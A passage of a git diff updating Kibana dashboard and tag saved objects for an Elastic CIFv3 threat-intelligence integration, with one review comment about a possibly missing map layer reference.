tions\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#ea7861\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#e05235\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"STATIC\",\"options\":{\"value\":\"\"}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}}},\"isTimeAware\":true},\"inclu
deInFitToBounds\":true,\"type\":\"TILED_VECTOR\",\"joins\":[]}]", + "layerListJSON": "[{\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"3df0f38b-db9e-451e-bb01-5a27226075df\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"TILE\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"sourceDescriptor\":{\"geoField\":\"threat.indicator.geo.location\",\"filterByMapBounds\":true,\"scalingType\":\"MVT\",\"id\":\"13a0c980-6195-4e3e-8506-b383ab8866c2\",\"type\":\"ES_SEARCH\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"tooltipProperties\":[],\"sortField\":\"\",\"sortOrder\":\"desc\",\"topHitsSplitField\":\"\",\"topHitsSize\":1,\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"id\":\"0a0a1a3e-d002-47b0-a99a-03eb965b8bc4\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#ea7861\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#e05235\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"STATIC\",\"options\":{\"value\":\"\"}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}}},\"isTimeAware\":true},\"includeInFitToBounds\":true,\"type\":\"MVT_VECTOR\",\"joins\":[]}]", "mapStateJSON": 
"{\"zoom\":1.14,\"center\":{\"lon\":0,\"lat\":19.94277},\"timeFilters\":{\"from\":\"now-75m\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":0},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", "title": "", "uiStateJSON": "{\"isLayerTOCOpen\":false,\"openTOCDetails\":[]}" @@ -580,19 +611,17 @@ }, "panelIndex": "ad624736-f1dd-4d77-8517-680e7bc4b882", "title": "IP Source Location [Logs CIFv3]", - "type": "map", - "version": "8.0.0-SNAPSHOT" + "type": "map" } ], "timeRestore": false, "title": "[Logs CIFv3] IPs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:22.282Z", "id": "ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -604,6 +633,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "7725b9bd-df8d-491c-a518-fe00a4538ebc:indexpattern-datasource-current-indexpattern", 
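Review bot: The rewritten `layerListJSON` in this hunk replaces the map layer's inline `\"indexPatternId\":\"logs-*\"` with `\"indexPatternRefName\":\"layer_1_source_index_pattern\"`, which has to be resolved through an entry in the dashboard's `references`, yet none of the visible references hunks for this dashboard adds a reference with that name. If a reference along the lines of `"name": "ad624736-f1dd-4d77-8517-680e7bc4b882:layer_1_source_index_pattern"` pointing at `logs-*` is not already present in the unchanged part of `references`, the "IP Source Location" layer will presumably have no data view after import. The remainder of the references array lies outside this hunk, so this is worth checking against the full file before merging.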
@@ -660,40 +694,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d:indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "02f1732b-a981-4fba-8b27-b944f2f3c98c:indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "fda93ed1-72f0-4489-80b7-9e69d14f30aa:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "73a752f9-bde5-4396-8ede-e9e77a37182d:indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8994501a-1550-4cf2-857f-d6b6491ffb62:indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json index a4f913d02f5..0d9f7b20c30 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json 
@@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about indicators ingested from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -95,8 +118,7 @@ }, "panelIndex": "555e9e6c-04e9-4022-b6df-bda07dde30c4", "title": "Overview Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -230,8 +252,7 @@ }, "panelIndex": "e971fedd-6afd-4d03-93ac-d0c751acc254", "title": "Feed and Indicator Selector [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -250,7 +271,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7": { "columnOrder": [ @@ -265,7 +286,7 @@ "label": "Records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "4d7ca99c-8a53-4a7f-96db-409251c0e391": { "dataType": "string", @@ -333,7 +354,6 @@ "legend": { "isInside": false, "isVisible": true, - "legendSize": "auto", "position": "bottom", "shouldTruncate": false, "showSingleSeries": true 
@@ -368,8 +388,7 @@ }, "panelIndex": "aab4fac0-d39c-4521-aa9b-0a49d5938e9e", "title": "Indicators ingested per Datastream [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -388,7 +407,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "2c2ce8ee-a793-4242-aad4-06f3a8707b02": { "columnOrder": [ @@ -420,7 +439,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -437,15 +456,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "1d9b6fbf-58e3-427e-a453-edec40466320" - ], "layerId": "2c2ce8ee-a793-4242-aad4-06f3a8707b02", "layerType": "data", "legendDisplay": "default", - "metric": "b6cbd44b-6f5d-4e1e-b1ab-0c09b3a67111", + "legendSize": "auto", + "metrics": [ + "b6cbd44b-6f5d-4e1e-b1ab-0c09b3a67111" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "1d9b6fbf-58e3-427e-a453-edec40466320" + ] } ], "shape": "donut" @@ -467,8 +489,7 @@ }, "panelIndex": "c446ea70-8a63-418e-8997-e43a5f7c5b5d", "title": "Total Percentage by Type [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -488,7 +509,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "070f5dbc-7687-4e97-9a57-5542b401c13f": { "columnOrder": [ @@ -502,7 +523,7 @@ "label": "Total Indicators", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -526,7 +547,7 @@ }, "title": "Total Indicators [Logs CIFv3]", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false 
@@ -540,8 +561,7 @@ }, "panelIndex": "d37eb797-f273-43c2-9004-b947891cce55", "title": "Total Indicators [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -564,7 +584,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "df8e3a91-700b-428a-a763-525076e4d3c8": { "columnOrder": [ @@ -601,7 +621,7 @@ } }, "title": "Total Datastreams [Logs CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -615,19 +635,17 @@ }, "panelIndex": "6509dcc9-bb9c-4c1f-80e9-612f67ada340", "title": "Total Datastreams [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Overview", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:37:44.566Z", "id": "ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -639,6 +657,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "e971fedd-6afd-4d03-93ac-d0c751acc254:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", 
@@ -705,15 +728,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "f654c447-12d2-41a4-9091-06169af11ba5:indexpattern-datasource-layer-682732d8-8691-4c5a-bf89-de8e30d71dfb", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json index 3b5a8713c09..4838688d9f1 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about Email type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { 
@@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "cd81a60b-2661-48b3-a40f-ba8451e802a6": { "columnOrder": [ @@ -146,12 +168,15 @@ "visualization": { "accessor": "4f96463f-c5f9-448b-ab9e-7e17a2bd5969", "layerId": "cd81a60b-2661-48b3-a40f-ba8451e802a6", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -165,8 +190,7 @@ }, "panelIndex": "3a6a2852-0fb8-45df-9a79-e7729691fe5f", "title": "Unique Addresses [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -185,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -223,7 +247,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -237,8 +261,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -257,7 +280,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "db89074c-e1fe-4091-bdb1-e42a36e82bac": { "columnOrder": [ 
@@ -272,7 +295,7 @@ "label": "Count", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { "customLabel": true, @@ -337,19 +360,17 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Emails", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:59.871Z", "id": "ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -361,6 +382,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "3a6a2852-0fb8-45df-9a79-e7729691fe5f:indexpattern-datasource-current-indexpattern", @@ -392,15 +418,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file 
diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json index 31b5359b56b..0f5d3c51dd1 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about URL type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "88a112e1-6da1-49d3-9177-19f98280c200": { "columnOrder": [ @@ -154,7 +176,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false 
@@ -168,8 +190,7 @@ }, "panelIndex": "c7c6e8dc-b649-434c-9650-8a1564d4d676", "title": "Unique Ports [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -188,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "a6fa56f8-32fa-405d-8771-dade4fe75d62": { "columnOrder": [ @@ -226,7 +247,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -240,8 +261,7 @@ }, "panelIndex": "73a752f9-bde5-4396-8ede-e9e77a37182d", "title": "Unique File Extensions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -260,7 +280,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -298,7 +318,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -312,8 +332,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -332,7 +351,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "0f63318a-a857-4d83-89ce-a94e2242b79e": { "columnOrder": [ @@ -346,7 +365,7 @@ "label": "Records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "df0791a6-247c-4434-a43a-fdea7577ca34": { "dataType": "string", 
@@ -381,16 +400,17 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "df0791a6-247c-4434-a43a-fdea7577ca34" - ], "layerId": "0f63318a-a857-4d83-89ce-a94e2242b79e", "layerType": "data", "legendDisplay": "show", - "legendSize": "auto", - "metric": "77a48096-02aa-4b7a-8a7b-131fc38988bd", + "metrics": [ + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "df0791a6-247c-4434-a43a-fdea7577ca34" + ] } ], "shape": "donut" @@ -412,8 +432,7 @@ }, "panelIndex": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d", "title": "Percentage of URL Schema used [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -432,7 +451,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "db89074c-e1fe-4091-bdb1-e42a36e82bac": { "columnOrder": [ @@ -447,7 +466,7 @@ "label": "Count", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { "customLabel": true, @@ -512,8 +531,7 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -532,7 +550,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "dfaa5b71-ed27-4602-9dbe-d263fd33aa05": { "columnOrder": [ @@ -546,7 +564,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "c00d8a88-7047-4fa4-b99f-7e8be1370b6f": { "dataType": "string", 
@@ -581,15 +599,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "c00d8a88-7047-4fa4-b99f-7e8be1370b6f" - ], "layerId": "dfaa5b71-ed27-4602-9dbe-d263fd33aa05", "layerType": "data", "legendDisplay": "default", - "metric": "14f7e661-8382-4e25-a998-10c6c576255e", + "legendSize": "auto", + "metrics": [ + "14f7e661-8382-4e25-a998-10c6c576255e" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "c00d8a88-7047-4fa4-b99f-7e8be1370b6f" + ] } ], "shape": "treemap" @@ -611,19 +632,17 @@ }, "panelIndex": "353bb92f-8375-4dc6-b961-9ed7f7509627", "title": "Most Popular File Extensions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] URLs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:01.582Z", "id": "ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -635,6 +654,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-current-indexpattern", 
@@ -696,15 +720,16 @@
"type": "index-pattern"
},
{
- "id": "logs-*",
- "name": "fda93ed1-72f0-4489-80b7-9e69d14f30aa:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe",
- "type": "index-pattern"
+ "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1",
+ "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1",
+ "type": "tag"
},
{
- "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1",
- "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1",
+ "id": "ti_cif3-security-solution-default",
+ "name": "tag-ref-security-solution-default",
"type": "tag"
}
],
- "type": "dashboard"
+ "type": "dashboard",
+ "typeMigrationVersion": "8.9.0"
}
\ No newline at end of file
diff --git a/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json b/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json
similarity index 54%
rename from packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json
rename to packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json
index 5d464afed90..e5990bbf9ee 100644
--- a/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json
+++ b/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json
@@ -4,11 +4,11 @@
"description": "",
"name": "CIFv3"
},
- "coreMigrationVersion": "8.0.0",
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2024-04-08T18:33:58.759Z",
"id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1",
- "migrationVersion": {
- "tag": "8.0.0"
- },
+ "managed": true,
"references": [],
- "type": "tag"
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
}
\ No newline at end of file
diff --git a/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json b/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json
new file mode 100644
index 00000000000..753b6c2c22c
--- /dev/null
+++ b/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json
@@ -0,0 +1,14 @@
+{
+ "attributes": {
+ "color": "#FFA500",
+ "description": "Tag defined in package-spec",
+ "name": "Security Solution"
+ },
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2024-04-08T15:46:24.907Z",
+ "id": "ti_cif3-security-solution-default",
+ "managed": false,
+ "references": [],
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
+}
\ No newline at end of file
diff --git a/packages/ti_cif3/manifest.yml b/packages/ti_cif3/manifest.yml
index f04e9e79ac4..dce74b0f503 100644
